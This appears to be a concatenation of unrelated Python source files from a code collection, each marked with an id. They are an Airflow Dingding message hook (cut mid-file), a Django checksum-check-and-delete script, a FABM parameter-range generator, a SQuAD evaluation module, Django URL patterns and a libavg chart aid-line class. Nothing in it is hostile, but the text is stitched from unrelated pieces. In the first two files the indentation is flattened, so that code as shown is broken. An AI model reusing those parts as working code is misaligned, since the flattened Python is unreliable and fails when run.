                'Dingding token is required but none was found; check your conn_id configuration.'
)
return f'robot/send?access_token={token}'
def _build_message(self) -> str:
"""
        Build the different types of Dingding message.
        For the most commonly used type, text, the caller only passes the message content;
        the hook wraps it into a dict like ``{'content': 'message'}``.
"""
if self.message_type in ['text', 'markdown']:
data = {
'msgtype': self.message_type,
self.message_type: {'content': self.message} if self.message_type == 'text' else self.message,
'at': {'atMobiles': self.at_mobiles, 'isAtAll': self.at_all},
}
else:
data = {'msgtype': self.message_type, self.message_type: self.message}
return json.dumps(data)
def get_conn(self, headers: Optional[dict] = None) -> Session:
"""
        Overwrite HttpHook get_conn because we only need the base_url and headers,
        not the generic connection params.
:param headers: additional headers to be passed through as a dictionary
:type headers: dict
"""
conn = self.get_connection(self.http_conn_id)
self.base_url = conn.host if conn.host else 'https://oapi.dingtalk.com'
session = requests.Session()
if headers:
session.headers.update(headers)
return session
def send(self) -> None:
"""Send Dingding message"""
support_type = ['text', 'link', 'markdown', 'actionCard', 'feedCard']
if self.message_type not in support_type:
raise ValueError(
                'DingdingHook only supports {} '
                'so far, but received {}'.format(support_type, self.message_type)
)
data = self._build_message()
self.log.info('Sending Dingding type %s message %s', self.message_type, data)
resp = self.run(
endpoint=self._get_endpoint(), data=data, headers={'Content-Type': 'application/json'}
)
        # A successful Dingding send returns errcode equal to 0
if int(resp.json().get('errcode')) != 0:
            raise AirflowException(f'Sending Dingding message failed, received error message {resp.text}')
        self.log.info('Dingding message sent successfully')
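# ---------------------------------------------------------------------------
# Illustrative usage sketch, not part of the original hook. It shows how
# DingdingHook might be driven, e.g. from a task failure callback. The
# connection id, the mobile number and the context key 'task_instance_key_str'
# are placeholders/assumptions rather than values taken from this file.
def _example_send_failure_alert(context):
    """Send a plain-text Dingding alert and @-mention one user (sketch)."""
    hook = DingdingHook(
        dingding_conn_id='dingding_default',
        message_type='text',
        message='Task failed: %s' % context.get('task_instance_key_str', 'unknown'),
        at_mobiles=['1380000xxxx'],
        at_all=False,
    )
    # _build_message() serialises this roughly as:
    # {"msgtype": "text", "text": {"content": "Task failed: ..."},
    #  "at": {"atMobiles": ["1380000xxxx"], "isAtAll": false}}
    hook.send()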
|
the-stack_0_25323
|
#!/usr/bin/env python
"""
update_dreqs_0321.py
Check the checksums of files in the selected dataset and remove from disk any
that don't match so that they can be restored again.
"""
import argparse
import logging.config
import os
import sys
import django
django.setup()
from pdata_app.models import DataFile, DataRequest, Settings # nopep8
from pdata_app.utils.common import adler32, delete_files # nopep8
__version__ = '0.1.0b1'
logger = logging.getLogger(__name__)
# The top-level directory to write output data to
BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir
def parse_args():
"""
Parse command-line arguments
"""
    parser = argparse.ArgumentParser(description='Check file checksums and delete mismatches')
parser.add_argument('-l', '--log-level',
help='set logging level (default: %(default)s)',
choices=['debug', 'info', 'warning', 'error'],
default='warning')
    parser.add_argument('request_id', help='the request id to update')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
model, expt, var_lab, table, var = args.request_id.split('_')
dreq = DataRequest.objects.get(
climate_model__short_name=model,
experiment__short_name=expt,
rip_code=var_lab,
variable_request__table_name=table,
variable_request__cmor_name=var
)
logger.debug('DataRequest is {}'.format(dreq))
logger.debug('Checking checksums')
checksum_mismatch = 0
for data_file in dreq.datafile_set.order_by('name'):
logger.debug('Checking {}'.format(data_file.name))
full_path = os.path.join(data_file.directory, data_file.name)
actual = adler32(full_path)
expected = data_file.checksum_set.first().checksum_value
if actual != expected:
logger.error(f'Checksum mismatch for {full_path}')
checksum_mismatch += 1
dfs = DataFile.objects.filter(name=data_file.name)
if dfs.count() != 1:
logger.error(f'Unable to select file for deletion {full_path}')
else:
delete_files(dfs.all(), BASE_OUTPUT_DIR)
if checksum_mismatch:
logger.error(f'Exiting due to {checksum_mismatch} checksum failures.')
logger.error(f'Data request is in {dreq.directories()}')
sys.exit(1)
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
log_level = getattr(logging, cmd_args.log_level.upper())
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(levelname)s: %(message)s',
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
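# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original script. The adler32() helper
# used above is imported from pdata_app.utils.common and its implementation is
# not shown here; a chunked file checksum of that kind is typically built on
# zlib.adler32, roughly like this hypothetical version (the decimal-string
# return format is an assumption).
def _adler32_sketch(path, chunk_size=1024 * 1024):
    """Return the Adler-32 checksum of the file at `path` as a decimal string."""
    import zlib
    checksum = 1  # Adler-32 checksums start from 1
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            checksum = zlib.adler32(chunk, checksum)
    return str(checksum & 0xFFFFFFFF)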
|
the-stack_0_25324
|
import argparse
import yaml
parser = argparse.ArgumentParser()
parser.add_argument('fabm_yaml')
parser.add_argument('--scale', type=float, default=0.3)
args = parser.parse_args()
with open(args.fabm_yaml) as f:
y = yaml.safe_load(f)
for name, info in y['instances'].items():
parameters = info.get('parameters', {})
if not parameters:
continue
for parameter, value in parameters.items():
path = 'instances/%s/parameters/%s' % (name, parameter)
if isinstance(value, (float, int)) and not isinstance(value, bool):
l, r = (1 - args.scale) * value, (1 + args.scale) * value
if r < l:
l, r = r, l
xml = '<parameter file="fabm.yaml" variable="%s" minimum="%s" maximum="%s" />' % (path, l, r)
if isinstance(value, int):
xml = '<!-- %s -->' % xml
print(xml)
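# ---------------------------------------------------------------------------
# Illustrative example, not part of the original script. For a hypothetical
# fabm.yaml fragment such as
#   instances:
#     phy:
#       parameters:
#         growth_rate: 1.0   # float parameter
#         num_classes: 4     # integer parameter
# a run with the default --scale 0.3 would print roughly:
#   <parameter file="fabm.yaml" variable="instances/phy/parameters/growth_rate" minimum="0.7" maximum="1.3" />
#   <!-- <parameter file="fabm.yaml" variable="instances/phy/parameters/num_classes" minimum="2.8" maximum="5.2" /> -->
# i.e. every numeric parameter gets a +/-30% range, and integer parameters are
# emitted commented out so they can be enabled by hand.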
|
the-stack_0_25326
|
# coding=utf-8
# Copyright 2018 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SQuAD evaluation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import re
import string
import numpy as np
import tensorflow as tf
from qanet.util import misc_util
__all__ = ["evaluate", "load_ground_truths", "load_predictions",
"evaluate_scores", "compute_f1", "compute_exact",
"get_start_end"]
def evaluate(groundtruth_file, prediction_file, data_format="squad"):
"""Evaluate SQUAD predictions given files."""
ground_truths, _ = load_ground_truths(groundtruth_file)
predictions, _, _ = load_predictions(prediction_file)
scores, f1_scores, exact_scores = evaluate_scores(ground_truths, predictions)
# SQuAD 2.0: get some more statistics over answers and no-answers
if data_format == "squad2":
has_ans_qids = [k for k, v in ground_truths.items() if v]
no_ans_qids = [k for k, v in ground_truths.items() if not v]
if has_ans_qids:
has_ans_scores = _make_eval_dict(f1_scores, exact_scores,
qid_list=has_ans_qids)
_merge_eval(scores, has_ans_scores, "HasAns")
if no_ans_qids:
no_ans_scores = _make_eval_dict(f1_scores, exact_scores,
qid_list=no_ans_qids)
_merge_eval(scores, no_ans_scores, "NoAns")
return scores
def load_ground_truths(groundtruth_file):
"""Load ground truth data."""
print("# Loading ground truths from %s" % groundtruth_file)
with tf.gfile.Open(groundtruth_file) as f:
dataset_json = json.load(f)
dataset = dataset_json["data"]
# get ground truths
ground_truths = {}
questions = {}
num_examples = 0
num_paragraphs = 0
for article in dataset:
for paragraph in article["paragraphs"]:
num_paragraphs += 1
# Answers
for qa in paragraph["qas"]:
if qa["id"] in ground_truths:
message = "Duplicated id " + qa["id"] + "."
tf.logging.info(message)
continue
ground_truths[qa["id"]] = list(
map(lambda x: x["text"], qa["answers"]))
questions[qa["id"]] = qa["question"]
num_examples += 1
tf.logging.info(" Num ground truths: %d" % num_examples)
tf.logging.info(" Num paragraphs: %d" % num_paragraphs)
return ground_truths, questions
def load_predictions(prediction_file, load_prob=False):
"""Load predictions from a prediction file."""
print("# Loading predictions from %s" % prediction_file)
num_examples = 0
predictions = {}
if load_prob:
start_prob, end_prob = {}, {}
else:
start_prob, end_prob = None, None
with tf.gfile.GFile(prediction_file) as f:
data = json.load(f)
for q_id in data:
if not isinstance(data[q_id], dict):
predictions[q_id] = data[q_id]
else:
predictions[q_id] = data[q_id]["answer"]
if load_prob:
start_prob[q_id] = np.array(data[q_id]["start_prob"])
end_prob[q_id] = np.array(data[q_id]["end_prob"])
num_examples += 1
tf.logging.info(" Num predictions: %d" % num_examples)
return predictions, start_prob, end_prob
def _make_eval_dict(f1_scores, exact_scores, qid_list=None):
"""Compute aggregated F1 and exact match scores."""
# Filter scores if qid_list is specified
if qid_list:
f1_scores_select = {}
exact_scores_select = {}
for qid in qid_list:
      if qid in f1_scores and qid in exact_scores:
f1_scores_select[qid] = f1_scores[qid]
exact_scores_select[qid] = exact_scores[qid]
else:
tf.logging.info("missing qid %s" % qid)
else:
f1_scores_select = f1_scores
exact_scores_select = exact_scores
# Compute scores
total = len(exact_scores_select)
return collections.OrderedDict([
("exact_match", 100.0 * sum(exact_scores_select.values()) / total),
("f1", 100.0 * sum(f1_scores_select.values()) / total),
("total", total),
])
def _merge_eval(main_eval, new_eval, prefix):
"""Merge evaluation dicts."""
for k in new_eval:
main_eval["%s_%s" % (prefix, k)] = new_eval[k]
def _normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def _handle_no_answer(prediction, ground_truths):
"""Check if there is no groundtruth answer and compute no-answer score."""
score = None
# Check for no-answer: ground_truths can look like ['', '', '']
  # The reason there are multiple empty values is that we operate in batches
  # and pad with '' up to the maximum number of answers.
has_answer = False
if ground_truths:
for answer in ground_truths:
if answer:
has_answer = True
break
if not has_answer: # No groundtruth answer
if _normalize_answer(prediction): # predict answer
score = 0.0
else:
score = 1.0
return score
def _f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = _normalize_answer(prediction).split()
ground_truth_tokens = _normalize_answer(ground_truth).split()
common = (collections.Counter(prediction_tokens) &
collections.Counter(ground_truth_tokens))
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def _em_score(prediction, ground_truth):
"""Compute EM score (binary value)."""
return int(_normalize_answer(prediction) == _normalize_answer(ground_truth))
def _compute_score(score_fn, prediction, ground_truths, answer_mask, is_byte):
"""Compute scores (EM, F1, etc.) given a score function."""
# Whether we are dealing with a sequence of bytes or not
if is_byte:
prediction = prediction.decode("utf-8")
ground_truths = [gt.decode("utf-8") for gt in ground_truths]
# SQuAD 2.0
score = _handle_no_answer(prediction, ground_truths)
# Has-answer case
# NOTE(thangluong): score can be 0.0 so we need to explicitly compare to None
if score is None:
# Execute over multiple answers
scores = [score_fn(prediction, gt) for gt in ground_truths]
if answer_mask is not None: # answer_mask can be a tensor
scores = scores * answer_mask
tf.logging.info("prediction %s, ground_truths %s, scores %s" % (
prediction, str(ground_truths), str(scores)))
score = max(scores)
else:
tf.logging.info("prediction %s, ground_truths %s, score %s" % (
prediction, str(ground_truths), str(score)))
return score
def compute_f1(prediction, ground_truths, answer_mask=None, is_byte=False):
"""Compute F1 score over multiple ground truths."""
return _compute_score(
_f1_score, prediction, ground_truths, answer_mask, is_byte)
def compute_exact(prediction, ground_truths, answer_mask=None, is_byte=False):
"""Compute exact match (EM) score over multiple ground_truths."""
return _compute_score(
_em_score, prediction, ground_truths, answer_mask, is_byte)
def evaluate_scores(ground_truths, predictions, label="# Scores"):
"""Main evaluation."""
f1_scores = {}
exact_scores = {}
for q_id in ground_truths:
if q_id not in predictions:
print("Unanswered question %s will receive score 0." % q_id)
continue
pred_answer = predictions[q_id]
gold_answers = ground_truths[q_id]
# Take max over all gold answers
exact_scores[q_id] = compute_exact(pred_answer, gold_answers)
f1_scores[q_id] = compute_f1(pred_answer, gold_answers)
scores = _make_eval_dict(f1_scores, exact_scores)
tf.logging.info("%s: %s" % (label, str(scores)))
misc_util.print_out("%s: %s" % (label, str(scores)))
return scores, f1_scores, exact_scores
def _compute_prob_matrix(start_prob, end_prob, max_ans_size=25):
"""Compute span prob matrix given start and end probabilities."""
assert len(start_prob) == len(end_prob)
context_len = len(start_prob)
mask = np.triu(
np.ones([context_len, context_len]) -
np.triu(np.ones([context_len, context_len]), max_ans_size))
prob_matrix = np.outer(start_prob, end_prob)
prob_matrix *= mask
return prob_matrix
def _compute_start_end(prob_matrix):
"""Given a span prob matrix, return the best span and its probability."""
assert prob_matrix.shape[0] == prob_matrix.shape[1]
context_len = prob_matrix.shape[0]
argmax_id = np.argmax(prob_matrix)
start = argmax_id // context_len
end = argmax_id % context_len
return start, end, prob_matrix[start, end]
def get_start_end(start_prob, end_prob):
prob_matrix = _compute_prob_matrix(start_prob, end_prob)
start, end, prob = _compute_start_end(prob_matrix)
return start, end, prob
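# ---------------------------------------------------------------------------
# Illustrative toy example, not part of the original module. It exercises the
# span-selection helpers above: the outer product of start and end
# probabilities is masked to spans with start <= end (and length below
# max_ans_size) before the argmax is taken.
def _example_get_start_end():
  start_prob = np.array([0.1, 0.6, 0.2, 0.1])
  end_prob = np.array([0.1, 0.1, 0.7, 0.1])
  # Expected result: start == 1, end == 2, prob == 0.6 * 0.7 == 0.42.
  return get_start_end(start_prob, end_prob)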
|
the-stack_0_25327
|
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns(
'',
# Archived stats
    url(r'^archive/(?P<slug>[^/]+)/(?P<year>\d{4})/(?P<month>\d{2})/$',
views.ArchiveListView.as_view(),
name='stats.archive_list'),
    url(r'^archive/(?P<slug>[^/]+)/'
        r'(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{1,2})/'
        r'(?P<model_name>\w+)/$',
views.ArchiveView.as_view(),
name='stats.archive'),
)
|
the-stack_0_25328
|
from libavg import avg
from libavg.avg import CursorEvent
from libavg_charts.aid_lines.orthogonal_aid_line import OrthogonalAidLine
from libavg_charts.axis.chart_axis_enums import Orientation
from logging_base.study_logging import StudyLog
class DepositAidLine(OrthogonalAidLine):
ADD_AID_LINE = "addAidLine"
DELETE_AID_LINE = "deleteAidLine"
def __init__(self, **kwargs):
"""
:param kwargs: Other parameters for the base.
"""
super(DepositAidLine, self).__init__(**kwargs)
# list of tuples: tuple[horizontal_aid_line, vertical_aid_line]
self._aid_lines = []
self._horizontal_aid_lines = []
self._vertical_aid_lines = []
self._horizontal_aid_line_drag_start_pos = {}
self._vertical_aid_line_drag_start_pos = {}
self.bind(self.ADD_AID_LINE, self._on_add_aid_line)
self.bind(self.DELETE_AID_LINE, self._on_delete_aid_line)
def _on_step_forward(self, steps=1, axis_index=0):
"""
Moves the aid line a number of steps (to the ticks of the axis) forward.
:param steps: The number of steps the aid line should be move forward.
:type steps: int
:param axis_index: The index of the axis that the step should be calculated with.
:type axis_index: int
"""
pass
def _on_step_backward(self, steps=1, axis_index=0):
"""
Moves the aid line a number of steps (to the ticks of the axis) backward.
:param steps: The number of steps the aid line should be move backward.
:type steps: int
:param axis_index: The index of the axis that the step should be calculated with.
:type axis_index: int
"""
pass
def _on_add_aid_line(self, pos):
"""
        Creates an aid line at the given position.
        :param pos: The position to create an aid line at.
:type pos: tuple[float, float]
"""
if not (self._aid_line_area[0] <= pos[0] <= self._aid_line_area[2] and
self._aid_line_area[1] <= pos[1] <= self._aid_line_area[3]):
return
h_aid_line = self._draw_horizontal_aid_line(pos=pos)
v_aid_line = self._draw_vertical_aid_line(pos=pos)
if h_aid_line:
self._horizontal_aid_lines.append(h_aid_line)
if v_aid_line:
self._vertical_aid_lines.append(v_aid_line)
# Draw the intersections and the labels.
if self._intersection_config.show_intersections:
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
)
self._remove_intersections()
self._draw_intersections(intersections=intersections)
if self._aid_line_config.show_label:
if h_aid_line:
self._draw_label(aid_line_div=h_aid_line, orientation=Orientation.Horizontal)
if v_aid_line:
self._draw_label(aid_line_div=v_aid_line, orientation=Orientation.Vertical)
        StudyLog.get_instance().write_event_log('A deposit aid line was created.')
def _on_delete_aid_line(self, pos):
"""
        Deletes an aid line at the given position, if one lies there.
        :param pos: The position to delete an aid line at.
:type pos: tuple[float, float]
"""
if not (self._aid_line_area[0] <= pos[0] <= self._aid_line_area[2] and
self._aid_line_area[1] <= pos[1] <= self._aid_line_area[3]):
return
aid_lines_to_remove = []
for i in range(len(self._horizontal_aid_lines)):
horizontal_aid_line = self._horizontal_aid_lines[i]
line_node = horizontal_aid_line.getChild(0)
aid_line_size = (
line_node.pos1[0],
horizontal_aid_line.pos[1] - line_node.strokewidth / 2,
line_node.pos2[0],
horizontal_aid_line.pos[1] + line_node.strokewidth / 2
)
if aid_line_size[0] <= pos[0] <= aid_line_size[2] and aid_line_size[1] <= pos[1] <= aid_line_size[3]:
if i not in aid_lines_to_remove:
aid_lines_to_remove.append(i)
for i in range(len(self._vertical_aid_lines)):
vertical_aid_line = self._vertical_aid_lines[i]
line_node = vertical_aid_line.getChild(0)
aid_line_size = (
vertical_aid_line.pos[0] - line_node.strokewidth / 2,
line_node.pos1[1],
vertical_aid_line.pos[0] + line_node.strokewidth / 2,
line_node.pos2[1]
)
if aid_line_size[0] <= pos[0] <= aid_line_size[2] and aid_line_size[1] <= pos[1] <= aid_line_size[3]:
if i not in aid_lines_to_remove:
aid_lines_to_remove.append(i)
removed = 0
for i in aid_lines_to_remove:
i -= removed
yet_removed = 0
if 0 <= i < len(self._horizontal_aid_lines):
yet_removed = 1
self._horizontal_aid_lines.pop(i).unlink(True)
if i < len(self._vertical_aid_lines):
yet_removed = 1
self._vertical_aid_lines.pop(i).unlink(True)
            removed += yet_removed
if self._intersection_config.show_intersections:
self._remove_intersections()
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
self._draw_intersections(self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
))
        StudyLog.get_instance().write_event_log('A deposit aid line was deleted.')
def _draw_horizontal_aid_line(self, pos, with_outer=True):
"""
Draws a horizontal aid line.
:param pos: The position of the cursor.
:type pos: tuple[float, float]
:param with_outer: If the outer part of the line should be drawn.
:type with_outer: bool
:return: The created aid line.
:rtype: InteractiveDivNode
"""
aid_line = super(DepositAidLine, self)._draw_horizontal_aid_line(pos, with_outer)
aid_line.subscribe(avg.Node.CURSOR_DOWN, self._on_aid_line_cursor_down)
aid_line.start_listening(
drag_started=self._on_aid_line_drag_started,
dragged=self._on_aid_line_drag,
drag_ended=self._on_aid_line_drag_end
)
return aid_line
def _draw_vertical_aid_line(self, pos, with_outer=True):
"""
Draws a vertical aid line.
:param pos: The position of the cursor.
:type pos: tuple[float, float]
:param with_outer: If the outer part of the line should be drawn.
:type with_outer: bool
:return: The created aid line.
:rtype: InteractiveDivNode
"""
aid_line = super(DepositAidLine, self)._draw_vertical_aid_line(pos, with_outer)
aid_line.subscribe(avg.Node.CURSOR_DOWN, self._on_aid_line_cursor_down)
aid_line.start_listening(
drag_started=self._on_aid_line_drag_started,
dragged=self._on_aid_line_drag,
drag_ended=self._on_aid_line_drag_end
)
return aid_line
def _on_aid_line_cursor_down(self, event):
"""
        Called on a cursor-down event on an aid line; records the drag start position.
:type event: CursorEvent
"""
sender = event.node
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
rel_event_pos = self._chart.getRelPos(event.pos)
if index < len(self._horizontal_aid_lines) and index not in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_line_drag_start_pos[index] = 0, rel_event_pos[1]
if index < len(self._vertical_aid_lines) and index not in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_line_drag_start_pos[index] = rel_event_pos[0], 0
def _on_aid_line_drag_started(self, sender):
"""
        Called when a drag on an aid line has started.
:type sender: InteractiveDivNode
"""
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
if index < len(self._horizontal_aid_lines) and index in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_lines[index].pos = self._horizontal_aid_line_drag_start_pos[index]
self._horizontal_aid_lines[index].drag_start_pos = self._horizontal_aid_line_drag_start_pos[index]
if index < len(self._vertical_aid_lines) and index in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_lines[index].pos = self._vertical_aid_line_drag_start_pos[index]
self._vertical_aid_lines[index].drag_start_pos = self._vertical_aid_line_drag_start_pos[index]
def _on_aid_line_drag(self, sender, pos_change):
"""
Called if an aid line was dragged.
:param pos_change: The offset from the last pos.
:type pos_change: tuple[float, float]
"""
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
pos_change = self._horizontal_aid_lines[index].last_absolute_drag_offset
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
pos_change = self._vertical_aid_lines[index].last_absolute_drag_offset
if index < len(self._horizontal_aid_lines):
new_pos = self._check_for_snapping(
pos=(self._horizontal_aid_lines[index].pos[0], self._horizontal_aid_lines[index].drag_start_pos[1] + pos_change[1]),
orientation=Orientation.Horizontal
)
pos, _ = self._check_aid_line_pos(aid_line_pos=new_pos, orientation=Orientation.Horizontal)
self._horizontal_aid_lines[index].pos = pos or new_pos
if self._aid_line_config.show_label:
self._draw_label(aid_line_div=self._horizontal_aid_lines[index], orientation=Orientation.Horizontal)
if index < len(self._vertical_aid_lines):
new_pos = self._check_for_snapping(
pos=(self._vertical_aid_lines[index].drag_start_pos[0] + pos_change[0], self._vertical_aid_lines[index].pos[1]),
orientation=Orientation.Vertical
)
pos, _ = self._check_aid_line_pos(aid_line_pos=new_pos, orientation=Orientation.Vertical)
self._vertical_aid_lines[index].pos = pos or new_pos
if self._aid_line_config.show_label:
self._draw_label(aid_line_div=self._vertical_aid_lines[index], orientation=Orientation.Vertical)
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys()
)
self._remove_intersections()
self._draw_intersections(intersections=intersections)
def _on_aid_line_drag_end(self, sender, pos_change):
"""
        Called when a drag on an aid line has ended.
:type sender: InteractiveDivNode
:type pos_change: tuple[float, float]
"""
self._on_aid_line_drag(sender=sender, pos_change=pos_change)
if sender in self._horizontal_aid_lines:
index = self._horizontal_aid_lines.index(sender)
else: # sender in self._vertical_aid_lines:
index = self._vertical_aid_lines.index(sender)
if index < len(self._horizontal_aid_lines) and index in self._horizontal_aid_line_drag_start_pos:
self._horizontal_aid_line_drag_start_pos.pop(index)
if index < len(self._vertical_aid_lines) and index in self._vertical_aid_line_drag_start_pos:
self._vertical_aid_line_drag_start_pos.pop(index)
orientation = Orientation.Horizontal if sender in self._horizontal_aid_lines else Orientation.Vertical
new_pos, in_border_area = self._check_aid_line_pos(sender.pos, orientation)
if in_border_area:
if orientation is Orientation.Horizontal:
self._on_delete_aid_line((self._aid_line_area[0] + (self._aid_line_area[2] - self._aid_line_area[0]) / 2, sender.pos[1]))
else:
self._on_delete_aid_line((sender.pos[0], self._aid_line_area[1] + (self._aid_line_area[3] - self._aid_line_area[1]) / 2))
def reset(self):
"""
Resets this aid line controller.
"""
for aid_line in self._horizontal_aid_lines:
aid_line.unlink(True)
for aid_line in self._vertical_aid_lines:
aid_line.unlink(True)
self._horizontal_aid_lines = []
self._vertical_aid_lines = []
self._remove_intersections()
def _on_selection_set_changed(self, sender, selection_set_id, selection_diff):
"""
Called when a selection in the chart has been changed.
:type sender: SelectionDataHolder
:param selection_set_id: The id of the selection set that was changed.
:type selection_set_id: str
:param selection_diff: The changed sub set.
:type selection_diff: list
:return: Was the given set removed? And all the data objects that are affected.
:rtype: tuple[bool, dict[str, DataObjects]]
"""
removed, data_objects = super(DepositAidLine, self)._on_selection_set_changed(sender, selection_set_id, selection_diff)
if not removed:
return
aid_line_values = {a.pos: Orientation.Horizontal for a in self._horizontal_aid_lines}
aid_line_values.update({a.pos : Orientation.Vertical for a in self._vertical_aid_lines})
intersections = self._get_intersections(
aid_line_orientations=aid_line_values.values(),
aid_line_positions=aid_line_values.keys(),
data_object_nodes={k: self._chart.data_object_nodes[k] for k, do in self._chart.data_objects.iteritems() if k in data_objects}
)
self._draw_intersections(intersections=intersections)
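# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original module. The deletion hit test
# in _on_delete_aid_line builds an axis-aligned box around each aid line from
# its endpoints and stroke width; a standalone version of that geometry, with
# hypothetical plain-tuple inputs instead of libavg nodes, looks roughly like:
def _example_hits_horizontal_aid_line(pos, line_y, x_start, x_end, strokewidth):
    """Return True if pos lies inside the strokewidth-thick band of the line."""
    box = (x_start, line_y - strokewidth / 2.0, x_end, line_y + strokewidth / 2.0)
    return box[0] <= pos[0] <= box[2] and box[1] <= pos[1] <= box[3]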
|